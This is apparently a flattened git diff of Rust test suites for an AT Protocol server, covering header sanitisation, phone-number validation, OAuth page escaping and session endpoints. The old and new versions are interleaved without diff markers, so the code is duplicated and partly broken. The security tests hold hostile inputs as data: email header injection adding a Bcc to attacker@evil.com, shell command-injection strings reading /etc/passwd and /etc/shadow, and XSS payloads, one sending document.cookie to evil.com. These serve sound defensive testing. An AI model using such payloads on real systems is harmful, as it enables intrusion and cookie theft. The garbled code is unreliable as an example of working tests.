"Text after newline should be on same line (no header injection)"
);
}
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
assert!(sanitized.contains("Injected") && sanitized.contains("Bcc:"));
#[test]
fn test_sanitize_header_value_preserves_content() {
let normal = "Normal Subject Line";
let sanitized = sanitize_header_value(normal);
assert_eq!(sanitized, "Normal Subject Line");
}
assert_eq!(sanitize_header_value(normal), "Normal Subject Line");
#[test]
fn test_sanitize_header_value_trims_whitespace() {
let padded = " Subject ";
let sanitized = sanitize_header_value(padded);
assert_eq!(sanitized, "Subject");
}
assert_eq!(sanitize_header_value(padded), "Subject");
#[test]
fn test_sanitize_header_value_handles_multiple_newlines() {
let input = "Line1\r\nLine2\nLine3\rLine4";
let sanitized = sanitize_header_value(input);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(
sanitized.contains("Line1"),
"Content before newlines preserved"
);
assert!(
sanitized.contains("Line4"),
"Content after newlines preserved"
);
}
let multi_newline = "Line1\r\nLine2\nLine3\rLine4";
let sanitized = sanitize_header_value(multi_newline);
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
assert!(sanitized.contains("Line1") && sanitized.contains("Line4"));
#[test]
fn test_email_header_injection_sanitization() {
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
let sanitized = sanitize_header_value(header_injection);
let lines: Vec<&str> = sanitized.split("\r\n").collect();
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
assert!(
sanitized.contains("Normal Subject"),
"Original content preserved"
);
assert!(
sanitized.contains("Bcc:"),
"Content after CRLF preserved as same line text"
);
assert!(
sanitized.contains("X-Injected:"),
"All content on same line"
);
assert_eq!(sanitized.split("\r\n").count(), 1);
assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:"));
let with_null = "client\0id";
assert!(sanitize_header_value(with_null).contains("client"));
let long_input = "x".repeat(10000);
assert!(!sanitize_header_value(&long_input).is_empty());
}
#[test]
fn test_valid_phone_number_accepts_correct_format() {
fn test_phone_number_validation() {
assert!(is_valid_phone_number("+1234567890"));
assert!(is_valid_phone_number("+12025551234"));
assert!(is_valid_phone_number("+442071234567"));
assert!(is_valid_phone_number("+4915123456789"));
assert!(is_valid_phone_number("+1"));
}
#[test]
fn test_valid_phone_number_rejects_missing_plus() {
assert!(!is_valid_phone_number("1234567890"));
assert!(!is_valid_phone_number("12025551234"));
}
#[test]
fn test_valid_phone_number_rejects_empty() {
assert!(!is_valid_phone_number(""));
}
#[test]
fn test_valid_phone_number_rejects_just_plus() {
assert!(!is_valid_phone_number("+"));
}
#[test]
fn test_valid_phone_number_rejects_too_long() {
assert!(!is_valid_phone_number("+12345678901234567890123"));
}
#[test]
fn test_valid_phone_number_rejects_letters() {
assert!(!is_valid_phone_number("+abc123"));
assert!(!is_valid_phone_number("+1234abc"));
assert!(!is_valid_phone_number("+a"));
}
#[test]
fn test_valid_phone_number_rejects_spaces() {
assert!(!is_valid_phone_number("+1234 5678"));
assert!(!is_valid_phone_number("+ 1234567890"));
assert!(!is_valid_phone_number("+1 "));
}
#[test]
fn test_valid_phone_number_rejects_special_chars() {
assert!(!is_valid_phone_number("+123-456-7890"));
assert!(!is_valid_phone_number("+1(234)567890"));
assert!(!is_valid_phone_number("+1.234.567.890"));
}
#[test]
fn test_signal_recipient_command_injection_blocked() {
let malicious_inputs = vec![
"+123; rm -rf /",
"+123 && cat /etc/passwd",
"+123`id`",
"+123$(whoami)",
"+123|cat /etc/shadow",
"+123\n--help",
"+123\r\n--version",
"+123--help",
];
for input in malicious_inputs {
assert!(
!is_valid_phone_number(input),
"Malicious input '{}' should be rejected",
input
);
for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`",
"+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help",
"+123\r\n--version", "+123--help"] {
assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious);
}
}
#[test]
fn test_image_file_size_limit_enforced() {
fn test_image_file_size_limits() {
let processor = ImageProcessor::new();
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
let result = processor.process(&oversized_data, "image/jpeg");
@@ -156,321 +81,109 @@ fn test_image_file_size_limit_enforced() {
}
Ok(_) => panic!("Should reject files over size limit"),
}
}
#[test]
fn test_image_file_size_limit_configurable() {
let processor = ImageProcessor::new().with_max_file_size(1024);
let data: Vec<u8> = vec![0u8; 2048];
let result = processor.process(&data, "image/jpeg");
assert!(result.is_err(), "Should reject files over configured limit");
assert!(processor.process(&data, "image/jpeg").is_err());
}
#[test]
fn test_oauth_template_xss_escaping_client_id() {
let malicious_client_id = "<script>alert('xss')</script>";
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
assert!(!html.contains("<script>"), "Script tags should be escaped");
assert!(
html.contains("&lt;script&gt;"),
"HTML entities should be used for escaping"
);
fn test_oauth_template_xss_protection() {
let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None);
assert!(!html.contains("<script>") && html.contains("&lt;script&gt;"));
let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None);
assert!(!html.contains("<img ") && html.contains("&lt;img"));
let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None);
assert!(!html.contains("<script>"));
let html = login_page("client123", None, None, "test-uri",
Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None);
assert!(!html.contains("<script>"));
let html = login_page("client123", None, None, "test-uri", None,
Some("\" onfocus=\"alert('xss')\" autofocus=\""));
assert!(!html.contains("onfocus=\"alert") && html.contains("&quot;"));
let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None);
assert!(!html.contains("onmouseover=\"alert"));
let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>"));
assert!(!html.contains("<script>") && !html.contains("<img "));
let html = success_page(Some("<script>steal_session()</script>"));
assert!(!html.contains("<script>"));
for (page, name) in [
(login_page("client", None, None, "uri", None, None), "login"),
(error_page("err", None), "error"),
(success_page(None), "success"),
] {
assert!(!page.contains("javascript:"), "{} page has javascript: URL", name);
}
let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None);
assert!(html.contains("action=\"/oauth/authorize\""));
}
#[test]
fn test_oauth_template_xss_escaping_client_name() {
let malicious_client_name = "<img src=x onerror=alert('xss')>";
let html = login_page(
"client123",
Some(malicious_client_name),
None,
"test-uri",
None,
None,
);
assert!(!html.contains("<img "), "IMG tags should be escaped");
assert!(
html.contains("&lt;img"),
"IMG tag should be escaped as HTML entity"
);
fn test_oauth_template_html_escaping() {
let html = login_page("client&test", None, None, "test-uri", None, None);
assert!(html.contains("&amp;") && !html.contains("client&test"));
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
assert!(html.contains("&quot;") || html.contains("&#34;"));
assert!(html.contains("&#39;") || html.contains("&apos;"));
let html = login_page("client<test>more", None, None, "test-uri", None, None);
assert!(html.contains("&lt;") && html.contains("&gt;") && !html.contains("<test>"));
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"),
"valid-uri", None, Some("user@example.com"));
assert!(html.contains("my-safe-client") || html.contains("My Safe App"));
assert!(html.contains("read write") || html.contains("read"));
assert!(html.contains("user@example.com"));
let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None);
assert!(!html.contains("onclick=\"alert"));
let html = login_page("客户端 クライアント", None, None, "test-uri", None, None);
assert!(html.contains("客户端") || html.contains("&#"));
}
#[test]
fn test_oauth_template_xss_escaping_scope() {
let malicious_scope = "\"><script>alert('xss')</script>";
let html = login_page(
"client123",
None,
Some(malicious_scope),
"test-uri",
None,
None,
);
assert!(
!html.contains("<script>"),
"Script tags in scope should be escaped"
);
}
#[test]
fn test_oauth_template_xss_escaping_error_message() {
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
let html = login_page(
"client123",
None,
None,
"test-uri",
Some(malicious_error),
None,
);
assert!(
!html.contains("<script>"),
"Script tags in error should be escaped"
);
}
#[test]
fn test_oauth_template_xss_escaping_login_hint() {
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
let html = login_page(
"client123",
None,
None,
"test-uri",
None,
Some(malicious_hint),
);
assert!(
!html.contains("onfocus=\"alert"),
"Event handlers should be escaped in login hint"
);
assert!(html.contains("&quot;"), "Quotes should be escaped");
}
#[test]
fn test_oauth_template_xss_escaping_request_uri() {
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
let html = login_page("client123", None, None, malicious_uri, None, None);
assert!(
!html.contains("onmouseover=\"alert"),
"Event handlers should be escaped in request_uri"
);
}
#[test]
fn test_oauth_error_page_xss_escaping() {
let malicious_error = "<script>steal()</script>";
let malicious_desc = "<img src=x onerror=evil()>";
let html = error_page(malicious_error, Some(malicious_desc));
assert!(
!html.contains("<script>"),
"Script tags should be escaped in error page"
);
assert!(
!html.contains("<img "),
"IMG tags should be escaped in error page"
);
}
#[test]
fn test_oauth_success_page_xss_escaping() {
let malicious_name = "<script>steal_session()</script>";
let html = success_page(Some(malicious_name));
assert!(
!html.contains("<script>"),
"Script tags should be escaped in success page"
);
}
#[test]
fn test_oauth_template_no_javascript_urls() {
let html = login_page("client123", None, None, "test-uri", None, None);
assert!(
!html.contains("javascript:"),
"Login page should not contain javascript: URLs"
);
let error_html = error_page("test_error", None);
assert!(
!error_html.contains("javascript:"),
"Error page should not contain javascript: URLs"
);
let success_html = success_page(None);
assert!(
!success_html.contains("javascript:"),
"Success page should not contain javascript: URLs"
);
}
#[test]
fn test_oauth_template_form_action_safe() {
let malicious_uri = "javascript:alert('xss')//";
let html = login_page("client123", None, None, malicious_uri, None, None);
assert!(
html.contains("action=\"/oauth/authorize\""),
"Form action should be fixed URL"
);
}
#[test]
fn test_send_error_types_have_display() {
fn test_send_error_display() {
let timeout = SendError::Timeout;
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
assert!(!format!("{}", timeout).is_empty());
assert!(!format!("{}", max_retries).is_empty());
assert!(!format!("{}", invalid_recipient).is_empty());
}
assert!(format!("{}", timeout).to_lowercase().contains("timeout"));
#[test]
fn test_send_error_timeout_message() {
let error = SendError::Timeout;
let msg = format!("{}", error);
assert!(
msg.to_lowercase().contains("timeout"),
"Timeout error should mention timeout"
);
}
let max_retries = SendError::MaxRetriesExceeded("Server returned 503".to_string());
let msg = format!("{}", max_retries);
assert!(!msg.is_empty());
assert!(msg.contains("503") || msg.contains("retries"));
#[test]
fn test_send_error_max_retries_includes_detail() {
    // MaxRetriesExceeded must carry context from the wrapped detail string.
    let rendered = SendError::MaxRetriesExceeded("Server returned 503".to_string()).to_string();
    let has_context = rendered.contains("503") || rendered.contains("retries");
    assert!(has_context, "MaxRetriesExceeded should include context");
    // InvalidRecipient must render to something non-empty as well.
    let invalid_rendered = SendError::InvalidRecipient("bad recipient".to_string()).to_string();
    assert!(!invalid_rendered.is_empty());
}
#[tokio::test]
async fn test_check_signup_queue_accepts_session_jwt() {
async fn test_signup_queue_authentication() {
use common::{base_url, client, create_account_and_login};
let base = base_url().await;
let http_client = client();
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
.send().await.unwrap();
assert_eq!(res.status(), reqwest::StatusCode::OK);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["activated"], true);
let (token, _did) = create_account_and_login(&http_client).await;
let res = http_client
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
.header("Authorization", format!("Bearer {}", token))
.send()
.await
.unwrap();
assert_eq!(
res.status(),
reqwest::StatusCode::OK,
"Session JWTs should be accepted"
);
.send().await.unwrap();
assert_eq!(res.status(), reqwest::StatusCode::OK);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["activated"], true);
}
#[tokio::test]
async fn test_check_signup_queue_no_auth() {
    // The signup-queue endpoint requires no credentials at all.
    use common::{base_url, client};
    let base = base_url().await;
    let http_client = client();
    let url = format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base);
    let res = http_client.get(url).send().await.unwrap();
    assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
    let body: serde_json::Value = res.json().await.unwrap();
    assert_eq!(body["activated"], true);
}
#[test]
fn test_html_escape_ampersand() {
    // A literal `&` in the client id must be entity-encoded in the page.
    let rendered = login_page("client&test", None, None, "test-uri", None, None);
    assert!(rendered.contains("&amp;"), "Ampersand should be escaped");
    let raw_present = rendered.contains("client&test");
    assert!(!raw_present, "Raw ampersand should not appear in output");
}
#[test]
fn test_html_escape_quotes() {
    // Both quote styles must be escaped so attribute values cannot be broken out of.
    let rendered = login_page("client\"test'more", None, None, "test-uri", None, None);
    let double_escaped = rendered.contains("&quot;") || rendered.contains("&#34;");
    assert!(double_escaped, "Double quotes should be escaped");
    let single_escaped = rendered.contains("&#39;") || rendered.contains("&apos;");
    assert!(single_escaped, "Single quotes should be escaped");
}
#[test]
fn test_html_escape_angle_brackets() {
let html = login_page("client<test>more", None, None, "test-uri", None, None);
assert!(html.contains("&lt;"), "Less than should be escaped");
assert!(html.contains("&gt;"), "Greater than should be escaped");
assert!(
!html.contains("<test>"),
"Raw angle brackets should not appear"
);
}
#[test]
fn test_oauth_template_preserves_safe_content() {
    // Escaping must not mangle benign client metadata.
    let rendered = login_page(
        "my-safe-client",
        Some("My Safe App"),
        Some("read write"),
        "valid-uri",
        None,
        Some("user@example.com"),
    );
    let client_shown = rendered.contains("my-safe-client") || rendered.contains("My Safe App");
    assert!(client_shown, "Safe content should be preserved");
    let scope_shown = rendered.contains("read write") || rendered.contains("read");
    assert!(scope_shown, "Scope should be preserved");
    assert!(
        rendered.contains("user@example.com"),
        "Login hint should be preserved"
    );
}
#[test]
fn test_csrf_like_input_value_protection() {
    // An attribute-breakout payload must not become a live event handler.
    let payload = "\" onclick=\"alert('csrf')";
    let rendered = login_page("client", None, None, payload, None, None);
    let handler_injected = rendered.contains("onclick=\"alert");
    assert!(!handler_injected, "Event handlers should not be executable");
}
#[test]
fn test_unicode_handling_in_templates() {
    // Non-ASCII client ids must survive, either verbatim or entity-encoded.
    let rendered = login_page("客户端 クライアント", None, None, "test-uri", None, None);
    let preserved = rendered.contains("客户端") || rendered.contains("&#");
    assert!(preserved, "Unicode should be preserved or encoded");
}
#[test]
fn test_null_byte_in_input() {
    // Sanitization may strip the NUL but must keep the text before it.
    let sanitized = sanitize_header_value("client\0id");
    assert!(
        sanitized.contains("client"),
        "Content before null should be preserved"
    );
}
#[test]
fn test_very_long_input_handling() {
    // A 10k-character value must still sanitize to a non-empty result.
    let oversized = "x".repeat(10000);
    let sanitized = sanitize_header_value(&oversized);
    assert!(
        !sanitized.is_empty(),
        "Long input should still produce output"
    );
}

View File

@@ -6,384 +6,118 @@ use reqwest::StatusCode;
use serde_json::{Value, json};
#[tokio::test]
async fn test_health() {
async fn test_server_basics() {
let client = client();
let res = client
.get(format!("{}/health", base_url().await))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
assert_eq!(res.text().await.unwrap(), "OK");
}
#[tokio::test]
async fn test_describe_server() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.describeServer",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
let base = base_url().await;
let health = client.get(format!("{}/health", base)).send().await.unwrap();
assert_eq!(health.status(), StatusCode::OK);
assert_eq!(health.text().await.unwrap(), "OK");
let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap();
assert_eq!(describe.status(), StatusCode::OK);
let body: Value = describe.json().await.unwrap();
assert!(body.get("availableUserDomains").is_some());
}
#[tokio::test]
async fn test_create_session() {
async fn test_account_and_session_lifecycle() {
let client = client();
let base = base_url().await;
let handle = format!("user_{}", uuid::Uuid::new_v4());
let payload = json!({
"handle": handle,
"email": format!("{}@example.com", handle),
"password": "password"
});
let create_res = client
.post(format!(
"{}/xrpc/com.atproto.server.createAccount",
base_url().await
))
.json(&payload)
.send()
.await
.expect("Failed to create account");
let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" });
let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
.json(&payload).send().await.unwrap();
assert_eq!(create_res.status(), StatusCode::OK);
let create_body: Value = create_res.json().await.unwrap();
let did = create_body["did"].as_str().unwrap();
let _ = verify_new_account(&client, did).await;
let payload = json!({
"identifier": handle,
"password": "password"
});
let res = client
.post(format!(
"{}/xrpc/com.atproto.server.createSession",
base_url().await
))
.json(&payload)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert!(body.get("accessJwt").is_some());
let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
.json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap();
assert_eq!(login.status(), StatusCode::OK);
let login_body: Value = login.json().await.unwrap();
let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string();
let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string();
let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base))
.bearer_auth(&refresh_jwt).send().await.unwrap();
assert_eq!(refresh.status(), StatusCode::OK);
let refresh_body: Value = refresh.json().await.unwrap();
assert!(refresh_body["accessJwt"].as_str().is_some());
assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt);
assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt);
let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
.json(&json!({ "password": "password" })).send().await.unwrap();
assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY);
let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
.json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" }))
.send().await.unwrap();
assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST);
let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base))
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED);
let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base))
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_create_session_missing_identifier() {
    // Omitting the identifier field must fail request validation.
    let client = client();
    let res = client
        .post(format!(
            "{}/xrpc/com.atproto.server.createSession",
            base_url().await
        ))
        .json(&json!({ "password": "password" }))
        .send()
        .await
        .expect("Failed to send request");
    let status = res.status();
    let is_validation_error =
        status == StatusCode::BAD_REQUEST || status == StatusCode::UNPROCESSABLE_ENTITY;
    assert!(
        is_validation_error,
        "Expected 400 or 422 for missing identifier, got {}",
        status
    );
}
#[tokio::test]
async fn test_create_account_invalid_handle() {
    // Handles with illegal characters are rejected outright.
    let client = client();
    let body = json!({
        "handle": "invalid!handle.com",
        "email": "test@example.com",
        "password": "password"
    });
    let res = client
        .post(format!(
            "{}/xrpc/com.atproto.server.createAccount",
            base_url().await
        ))
        .json(&body)
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(
        res.status(),
        StatusCode::BAD_REQUEST,
        "Expected 400 for invalid handle chars"
    );
}
#[tokio::test]
async fn test_get_session() {
    // A bogus bearer token must not resolve to a session.
    let client = client();
    let url = format!("{}/xrpc/com.atproto.server.getSession", base_url().await);
    let res = client
        .get(url)
        .bearer_auth(AUTH_TOKEN)
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_refresh_session() {
    // Refreshing a session must rotate both the access and refresh tokens.
    let client = client();
    let base = base_url().await;
    let handle = format!("refresh_user_{}", uuid::Uuid::new_v4());
    let signup = json!({
        "handle": handle,
        "email": format!("{}@example.com", handle),
        "password": "password"
    });
    let create_res = client
        .post(format!("{}/xrpc/com.atproto.server.createAccount", base))
        .json(&signup)
        .send()
        .await
        .expect("Failed to create account");
    assert_eq!(create_res.status(), StatusCode::OK);
    let create_body: Value = create_res.json().await.unwrap();
    let did = create_body["did"].as_str().unwrap();
    let _ = verify_new_account(&client, did).await;
    // Log in to obtain the initial token pair.
    let login_res = client
        .post(format!("{}/xrpc/com.atproto.server.createSession", base))
        .json(&json!({ "identifier": handle, "password": "password" }))
        .send()
        .await
        .expect("Failed to login");
    assert_eq!(login_res.status(), StatusCode::OK);
    let login_body: Value = login_res.json().await.expect("Invalid JSON");
    let refresh_jwt = login_body["refreshJwt"]
        .as_str()
        .expect("No refreshJwt")
        .to_string();
    let access_jwt = login_body["accessJwt"]
        .as_str()
        .expect("No accessJwt")
        .to_string();
    // Refresh with the refresh token; both returned tokens must be new.
    let refresh_res = client
        .post(format!("{}/xrpc/com.atproto.server.refreshSession", base))
        .bearer_auth(&refresh_jwt)
        .send()
        .await
        .expect("Failed to refresh");
    assert_eq!(refresh_res.status(), StatusCode::OK);
    let refreshed: Value = refresh_res.json().await.expect("Invalid JSON");
    assert!(refreshed["accessJwt"].as_str().is_some());
    assert!(refreshed["refreshJwt"].as_str().is_some());
    assert_ne!(refreshed["accessJwt"].as_str().unwrap(), access_jwt);
    assert_ne!(refreshed["refreshJwt"].as_str().unwrap(), refresh_jwt);
}
#[tokio::test]
async fn test_delete_session() {
    // Deleting a session with a bogus token is rejected as unauthorized.
    let client = client();
    let url = format!("{}/xrpc/com.atproto.server.deleteSession", base_url().await);
    let res = client
        .post(url)
        .bearer_auth(AUTH_TOKEN)
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_get_service_auth_success() {
async fn test_service_auth() {
let client = client();
let base = base_url().await;
let (access_jwt, did) = create_account_and_login(&client).await;
let params = [("aud", "did:web:example.com")];
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.getServiceAuth",
base_url().await
))
.bearer_auth(&access_jwt)
.query(&params)
.send()
.await
.expect("Failed to send request");
let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert!(body["token"].is_string());
let body: Value = res.json().await.unwrap();
let token = body["token"].as_str().unwrap();
let parts: Vec<&str> = token.split('.').collect();
assert_eq!(parts.len(), 3, "Token should be a valid JWT");
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
let claims: Value = serde_json::from_slice(&payload_bytes).unwrap();
assert_eq!(claims["iss"], did);
assert_eq!(claims["sub"], did);
assert_eq!(claims["aud"], "did:web:example.com");
let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")])
.send().await.unwrap();
assert_eq!(lxm_res.status(), StatusCode::OK);
let lxm_body: Value = lxm_res.json().await.unwrap();
let lxm_token = lxm_body["token"].as_str().unwrap();
let lxm_parts: Vec<&str> = lxm_token.split('.').collect();
let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap();
let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap();
assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord");
let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.query(&[("aud", "did:web:example.com")]).send().await.unwrap();
assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED);
let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
.bearer_auth(&access_jwt).send().await.unwrap();
assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_service_auth_with_lxm() {
    // Requesting a service token with `lxm` embeds the method-restriction claim.
    use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
    let client = client();
    let (access_jwt, did) = create_account_and_login(&client).await;
    let res = client
        .get(format!(
            "{}/xrpc/com.atproto.server.getServiceAuth",
            base_url().await
        ))
        .bearer_auth(&access_jwt)
        .query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.expect("Response was not valid JSON");
    let segments: Vec<&str> = body["token"].as_str().unwrap().split('.').collect();
    let payload_bytes = URL_SAFE_NO_PAD.decode(segments[1]).expect("payload b64");
    let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
    assert_eq!(claims["iss"], did);
    assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
}
#[tokio::test]
async fn test_get_service_auth_no_auth() {
    // Without a bearer token the endpoint must refuse to mint anything.
    let client = client();
    let res = client
        .get(format!(
            "{}/xrpc/com.atproto.server.getServiceAuth",
            base_url().await
        ))
        .query(&[("aud", "did:web:example.com")])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "AuthenticationRequired");
}
#[tokio::test]
async fn test_get_service_auth_missing_aud() {
async fn test_account_status_and_activation() {
let client = client();
let base = base_url().await;
let (access_jwt, _) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.server.getServiceAuth",
base_url().await
))
.bearer_auth(&access_jwt)
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_check_account_status_success() {
    // The residue referenced an undefined `base` and issued the same request
    // twice; repaired with `base` defined and a single request.
    // An authenticated account reports an activated, valid repo status.
    let client = client();
    let base = base_url().await;
    let (access_jwt, _) = create_account_and_login(&client).await;
    let status = client
        .get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
        .bearer_auth(&access_jwt)
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(status.status(), StatusCode::OK);
    let body: Value = status.json().await.unwrap();
    assert_eq!(body["activated"], true);
    assert_eq!(body["validDid"], true);
    assert!(body["repoCommit"].is_string());
    assert!(body["repoRev"].is_string());
    assert!(body["indexedRecords"].is_number());
}
#[tokio::test]
async fn test_check_account_status_no_auth() {
    // Status checks are private; anonymous callers get AuthenticationRequired.
    let client = client();
    let url = format!(
        "{}/xrpc/com.atproto.server.checkAccountStatus",
        base_url().await
    );
    let res = client.get(url).send().await.expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "AuthenticationRequired");
}
#[tokio::test]
async fn test_activate_account_success() {
    // Activation succeeds for an authenticated account holder.
    let client = client();
    let (access_jwt, _) = create_account_and_login(&client).await;
    let url = format!(
        "{}/xrpc/com.atproto.server.activateAccount",
        base_url().await
    );
    let res = client
        .post(url)
        .bearer_auth(&access_jwt)
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
}
#[tokio::test]
async fn test_activate_account_no_auth() {
    // Anonymous activation attempts are rejected.
    let client = client();
    let url = format!(
        "{}/xrpc/com.atproto.server.activateAccount",
        base_url().await
    );
    let res = client.post(url).send().await.expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_deactivate_account_success() {
    // The residue referenced an undefined `base`; repaired with `base` defined
    // and the old/new bodies merged into one coherent sequence.
    // Activate/deactivate require a valid session; anonymous calls are rejected.
    let client = client();
    let base = base_url().await;
    let (access_jwt, _) = create_account_and_login(&client).await;
    // Anonymous status checks stay unauthorized.
    let unauth_status = client
        .get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
        .send()
        .await
        .unwrap();
    assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED);
    // The owner can activate; anonymous activation is rejected.
    let activate = client
        .post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
        .bearer_auth(&access_jwt)
        .send()
        .await
        .unwrap();
    assert_eq!(activate.status(), StatusCode::OK);
    let unauth_activate = client
        .post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
        .send()
        .await
        .unwrap();
    assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED);
    // Finally, the owner can deactivate the account.
    let deactivate = client
        .post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base))
        .bearer_auth(&access_jwt)
        .json(&json!({}))
        .send()
        .await
        .unwrap();
    assert_eq!(deactivate.status(), StatusCode::OK);
}

View File

@@ -6,285 +6,103 @@ use reqwest::StatusCode;
use serde_json::Value;
#[tokio::test]
async fn test_get_head_success() {
async fn test_get_head_comprehensive() {
let client = client();
let (did, _jwt) = setup_new_user("gethead-success").await;
let (did, jwt) = setup_new_user("gethead").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
.send().await.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
